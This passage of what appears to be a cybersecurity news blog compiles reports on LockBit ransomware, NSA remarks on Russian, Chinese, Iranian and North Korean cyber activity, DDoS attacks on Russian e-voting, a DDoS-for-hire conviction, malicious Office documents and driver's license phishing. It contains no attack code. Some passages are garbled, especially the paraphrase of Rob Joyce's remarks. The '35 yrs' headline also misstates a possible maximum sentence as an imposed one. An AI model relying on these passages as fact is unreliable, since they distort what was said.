In May 2020, it began collaborating with Maze, another ransomware organization, and in September of the same year, it debuted its very own leak site. LockBit v2.0 was released in June of this year. Furthermore, according to HC3, it employs a two-pronged extortion scheme involving the StealBit malware. It has improved encryption and circumvents user account control methods. 

"Threat actors continue to view unpatched systems as an easy, if not preferred, method of intrusion," wrote officials from the cybersecurity arm of the U.S. Department of Health and Human Services in its brief. 

It moreover relaunched its affiliate program, wherein affiliates determine the ransom, then choose a payment system, and receive the majority of the money before actually paying the organization. Armenia, Azerbaijan, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, and Uzbekistan are among the Commonwealth of Independent States countries where the program does not function. 

Based on an interview with a LockBit ransomware operator, the organization concluded that the malicious actors looked to have a "contradictory code of ethics." 

According to HC3, healthcare facilities are ideal targets, but the LockBit affiliate showed "a strong disdain for those who attack healthcare entities while displaying conflicting evidence about whether he targets them himself." 

"The U.S. also has lucrative targets, but with data privacy laws requiring victim companies to report all breaches, the incentive for such entities to pay the ransom is likely somewhat reduced," said HC3. 

"Cybercriminals are avid consumers of security news and remain up to date on the latest research and vulnerabilities, weaponizing that information to use in future attacks," it wrote. 

Threat advisories on various ransomware organizations, including BlackMatter, Conti, and Hive, have recently been published by the federal government. The alerts, however, haven't stopped the flood of ransomware news. Hive hacked a Missouri health center earlier this month and published patient names, Social Security numbers, and medical information on its blog.

NSA’s Cyber Chief Warned About the Increasing Cyber Threat

 

On Wednesday the 29th of September, the chief of the cyber branch of the National Security Agency cautioned about the growing number of digital dangers and threats that these cybercriminals pose. 

Rob Joyce, Director of the NSA Cybersecurity Directorate, stated during the ASPEN Cyber Summit in Colorado that nearly every single government in the world today has a cyber exploitation program. 

Joyce has been a special assistant of the president and cyber security coordinator of the National Security Council in 2018, with many other responsibilities in the nation's leading e-spy agency. 

“The vast majority of those are used for espionage and intelligence purposes, but… there is interest in dabbling in offensive cyber and outcomes. The difference between the top of the list and the bottom of the list, usually, is scale,” stated Joyce. 

There are some “high-end, sophisticated small actors, but they’re confined to whatever that national interest is that they’re aimed at so we see less of them.” 

Joyce also gave his evaluated statements on the so-called "Big Four" and the latest internet business of the foreign states who were historically the digital opponents of America — Russia, China, Iran, and North Korea. 

Starting with Russia he said that, it's the distressing force. Often they attempt not to boost their activities but to pull others down. They are still extremely active in intelligence-gathering efforts targeting vital infrastructure and countries. The problem is that they employ disruptive effects all around the world aggressively. The organization saw indications of U.S. vital infrastructure pre-positioning. For this everyone must strive against every item that can't be permitted. 

Further, talking about China he noted that, Chinese is off the charts, considering the scale and scope. The number of cyber actors from China is growing all over the world. NSA respected them less than that from four or five years ago to the present day, the changes as perceived. They have always been wide, loud, and boisterous, and what the organization discovers, the elite in that group is the elite if one has such a vast resource base. 

“The high end of the Chinese sophistication is really good. We’ve got to continue to understand, disrupt and then find ways across the whole of that technology to kind of push back… Yes, defense is really important, but you also have to work to disrupt so that’s the continuous engagement strategy out of the [Defense Department] and the idea that we got to put sand and friction in their operations, so they don’t get just free shots on goal,” he added. 

Later he made statements about Iran saying that Iran is still operational in cyber activities. Certainly, they were the first and foremost nation when everyone spoke of a bank distributed denial of service operations and the Shamoon Wiper malware. However what NSA observed is that they often concentrate very much on regional matters, at present. Their attention was not as broad on the impact. But they are capable, especially because their decision is less judgmental, and most crucially because it is a realistic measure. Iran sometimes does not appreciate how much it has done to, or has gone far as to arouse the wrath and concern of the larger community. 

Lastly, he told that North Korea remains extremely focused on the regime's income creation, as North Korea can not be affected even with several sanctions. They, therefore, had to develop ways to create cash, trade and realized that it is simpler to steal Bitcoin than to steal from Bangladesh Bank. They didn't attack the largest banks as hard, since in the crypto realm they made their required money. 

“The commercial firms were dealing with a lot of North Korean issues back when the [Covid-19] vaccine was an issue; they were going after the intellectual property of vaccine makers. So, still active, still a threat, very capable but mostly focused on crypto exchanges and creating money.” He added. 

Russian Electronic Voting System Struck by 19 DDoS Attacks in One Day

 

Yandex, the Russian technology and search engine powerhouse, disclosed last week that it had been hit by one of the world's biggest DDoS attacks ever recorded. 

A distributed denial-of-service (DDoS) attack involves flooding a website or service with a large amount of internet traffic until it stops working and eventually goes down. Cybercriminals have been known to create botnets and launch DDoS attacks using hacked systems or vulnerable/exposed Internet of Things (IoT) devices. 

Russia's remote electronic voting system has now become the next victim of the campaign, as to what appears to be a continuation of targeted DDoS attacks. 

According to reports, the 8th Russian State Duma (lower house) elections took place between September 17 and September 19. Voters had to head to the polls to cast their vote for the heads of nine Russian regions and 39 regional parliaments. 

According to Russian news agency Tass, remote electronic voting took place in six locations, including Sevastopol and the regions of Kursk, Murmansk, Nizhny Novgorod, Rostov, and Yaroslavl. 

Around 19 DDoS attempts were thwarted, according to Mikhail Oseevsky, president of Rostelecom. The head of the country's major digital service provider, Rostelecom, told the reporters at the Central Election Commission's information centre that some of the DDoS assaults were very short, spanning only a few minutes, while the biggest lasted 5 hours and 32 minutes. 

“It (the DDoS attack) began early in the morning and ended in the middle of the day,” Oseevsky disclosed. 

Many of the country's digital resources, including the elections, state services websites, and the CEC's portal, were attacked, according to Oseevsky. 

He continued by stating that there have been several efforts to launch large-scale attacks on these resources. The department, on the other hand, was well-prepared to combat and minimise the threat, according to the president. 

The assaults arose from a number of different countries which include: 
  • India 
  • China 
  • Brazil 
  • Russia 
  • Germany 
  • Thailand 
  • Lithuania 
  • Bangladesh 
  • United States 
According to the elections commission, three targeted cyberattacks were documented from abroad, two of which targeted the centre's main website and the third was a DDoS attack.

35 yrs Of Imprisonment for the Administrator of 200,000 DDoS Attacks

 

After a 9-day trial, a California jury that held two distributed denial of service (DDoS) operations administrators, found him guilty. Matthew Gatrel, a 32 years old man, of Saint Charles, Illinois, operated two websites that enabled payment to users to launch over 200,000 DDoS attacks on private and public targets. 

Court filings disclose that since October 2014 Gatrel has operated DDoS services. DownThem and Ampnode are the two sites being used, which allowed the operation of DDoS attacks. Gatrel has used DownThem to sell DDOS services subscriptions (sometimes referred to as "booters" or "stressers") and AmpNode has supplied clients that wanted pre-configured servers with DDoS attack programs and lists of vulnerable systems that may magnify the attack. 

The researchers have discovered that they have over 2,000 registered clients in databases of the DownThem booter portal. As per the documents, more than 200,000 DDoS attacks are launched by users. The targets covered households and schools, universities, websites of municipal and local authorities, and financial organizations throughout the world. 

“Often called a “booting” service, DownThem itself relied upon powerful servers associated with Gatrel’s AmpNode bulletproof hosting service. Many AmpNode customers were themselves operating for-profit DDoS services” - the U.S. Department of Justice.

Several subscriptions can be used by clients, each with different attack and offensive capabilities like length, force, or the potential of competitor attacks. 

If the victim is accessible, the service would deploy "reflected amplification attacks" from AmpNode attack servers, employing "hundreds or thousands of other servers connected to the Internet." 

In this operation, Gatrel hadn't been alone. In 2018, Juan Martinez of Pasadena assisted him to operate the DownThem website. 

Gatrel is faced with a maximum statutory imprisonment of 35 years scheduled for January 27, 2022, where sentences for the federal prison for three crimes of which he was found guilty are : 

  • one count of conspiracy to commit unauthorized impairment of a protected computer.
  • one count of conspiracy to commit wire fraud.
  • one count of unauthorized impairment of a protected computer.

However, Juan Martinez has already pleaded guilty, unlike Gatrel, to his final hearing on 2nd December · he can face a statutory maximum term of imprisonment of 10 years in his final trial.

43% of all Malware Installations are Concealed in Microsoft Office Documents

 

Companies have now employed hundreds of cloud applications to use due to the transition from work from the office to remote work, many of which may be vulnerable to cyberattacks or exploitation. This has increased the attack vector and exposed them to a slew of new threats. 

Although infiltrating office documents with malware has been around for a long period, it is indeed very effective in duping individuals. After embedding a hostile macro into an office document, malicious actors transmit the infected file to thousands of other people via email and wait for potential targets. A macro is a collection of commands that are packed together to perform a task automatically. 

Thus according to current Atlas VPN team research, malicious office documents account for 43 percent of all malware installations. Dangerous office files are common amongst cybercriminals because they can evade suspicion by most antivirus programs. 

The research is based on the Netskope Threat Lab Cloud and Threat Report: July 2021 Edition. It examined office documents from all platforms, including Microsoft Office 365, Google Docs, PDFs, and others. Only 14 percent of all downloaded malware were hostile office documents a year earlier, in the second quarter of 2020. Following that, in the third quarter of last year, the percentage rose to 38%. This growth was mostly affected by working remotely, as attackers discovered that malware-infected papers have proved to be beneficial. 

The effectiveness of EMOTET appears to have spread swiftly among cybercriminal gangs, motivating other hackers to adopt a similar approach. Another reason harmful documents succeed is that they can avoid detection by antivirus software and appear to be from a reliable source. 

Malware-infected document cyberattacks are designed to exploit the user's potential incapacity to perceive the danger. Only a blend of cybersecurity knowledge, training, and security software could provide the highest level of protection.

Fraudsters have taken advantage of Microsoft Office and Google Docs' popularity by introducing malicious code into the documents. To protect users from malware attacks, organizations must design and maintain a cybersecurity plan that addresses both the technological and human components. 

Driver's License Exploitation Scams Surge

 

The Covid epidemic has provided a ripe opportunity for cybercriminals, who are taking advantage of internet information from outdated driver's licenses of targeted individuals. 

According to Stateline, the “phishing” scams benefit from the fact that several nations have made emergency declarations permitting driver's licenses to remain in force beyond expiry dates. With the expiration of such renewals, drivers must now ensure that their licenses are updated, but scammers are taking full advantage of that shift, according to Stateline. 

In conventional phishing, cybercriminals send malicious links or attachments via email, and victims inadvertently click on them. Fraudsters use messaging to conduct their operations, which is known as "SMS phishing" or "smishing." 

As per state motor vehicle agencies, driver's license phishing frauds attempts to steal individual identities and personal information, that have already been sprouting up across the United States. Iowa, Minnesota, Ohio, Vermont, and Wyoming are among the states in which the frauds have been detected until now. 

Scam artists send out SMS or emails making false claims that the target's license needs an urgent update, as some of the information is missing, or even that it is about to expire and will be invalid within a few days. When a person clicks the hyperlink, a Google Forms spreadsheet with personally identifiable information such as a Social Security number and birth date is often opened. 

“It’s despicable,” said David Druker, a spokesperson for the Illinois secretary of state’s office, which issues driver’s licenses. “It’s just outrageous that when the country is going through the COVID crisis, people are taking the time and energy to steal information from others.” 

A large number of people in Illinois, according to Druker, reportedly obtained texts and emails from fraudsters posing as the secretary of state or employees from the state transportation department. Druker also added that he had no idea if anyone else has succumbed to the ruses. 

Upon learning well about phishing and smishing, Illinois officials notified the FBI and IRS, who had collaborated with Google to remove the bogus webpages. According to Druker, the authorities have discovered 1,035 sites so far, and Google has halted nearly 900 such websites. 

As per a notice issued earlier this month by the U.S. Department of Health and Human Services' Office of Inspector General, fraudsters are now employing door-to-door visits, along with telemarketing calls, messages, and social networking sites, to conduct COVID-19-related frauds. 

“Do not provide personal, medical, or financial details to anyone in exchange for vaccine information, and obtain vaccinations from trusted providers,” the Office of Inspector General urges. 

“Posting content that includes your date of birth, health care details, or other personally identifiable information can be used to steal your identity,” said the Inspector General’s office.